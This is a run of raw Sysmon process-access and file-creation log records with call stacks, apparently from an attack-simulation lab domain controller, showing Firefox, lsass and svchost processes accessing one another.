Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bad707|C:\Program Files\Mozilla Firefox\xul.dll+2b92852|C:\Program Files\Mozilla Firefox\xul.dll+1976bf6|C:\Program Files\Mozilla Firefox\xul.dll+275f52|C:\Program Files\Mozilla 
Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+304f9e5|C:\Program Files\Mozilla Firefox\xul.dll+61ab4b|C:\Program Files\Mozilla Firefox\xul.dll+3b2ff11|C:\Program Files\Mozilla Firefox\xul.dll+61f1d2|C:\Program Files\Mozilla Firefox\xul.dll+18570fb|C:\Program Files\Mozilla Firefox\xul.dll+18594cb|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24 10341000x800000000000000016824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+1528d12|C:\Program Files\Mozilla Firefox\xul.dll+1528bf3|C:\Program Files\Mozilla Firefox\xul.dll+160519f|C:\Program Files\Mozilla Firefox\xul.dll+160494c|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+5e2afd|C:\Program Files\Mozilla Firefox\xul.dll+228e466|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla 
Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e|C:\Program Files\Mozilla Firefox\xul.dll+324f98|C:\Program Files\Mozilla Firefox\xul.dll+32852c 10341000x800000000000000016823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+168c41e|C:\Program Files\Mozilla Firefox\xul.dll+14ca5ba|C:\Program Files\Mozilla Firefox\xul.dll+14c9dfb|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+14b9f41|C:\Program Files\Mozilla Firefox\xul.dll+160601d|C:\Program Files\Mozilla Firefox\xul.dll+2280350|C:\Program Files\Mozilla Firefox\xul.dll+227fdb4|C:\Program Files\Mozilla Firefox\xul.dll+228e12d|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e 10341000x800000000000000016822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+14b9f41|C:\Program Files\Mozilla Firefox\xul.dll+160601d|C:\Program Files\Mozilla Firefox\xul.dll+2280350|C:\Program Files\Mozilla Firefox\xul.dll+227fdb4|C:\Program Files\Mozilla Firefox\xul.dll+228e12d|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e 10341000x800000000000000016821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program 
Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program 
Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla 
Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla 
Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1016ae2|C:\Program Files\Mozilla Firefox\xul.dll+2bc816d|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.446{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.445{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.411{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\0LPNE0~1.DEF\pkcs11.txt2021-01-18 13:59:57.411 10341000x800000000000000016805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+244626|C:\Program Files\Mozilla 
Firefox\xul.dll+4d7733|C:\Program Files\Mozilla Firefox\xul.dll+4b7088d|UNKNOWN(000000238BDB4CF0) 10341000x800000000000000016804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+244626|C:\Program Files\Mozilla Firefox\xul.dll+4d7733|C:\Program Files\Mozilla Firefox\xul.dll+4b7088d|UNKNOWN(000000238BDB4CF0) 10341000x800000000000000016803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program 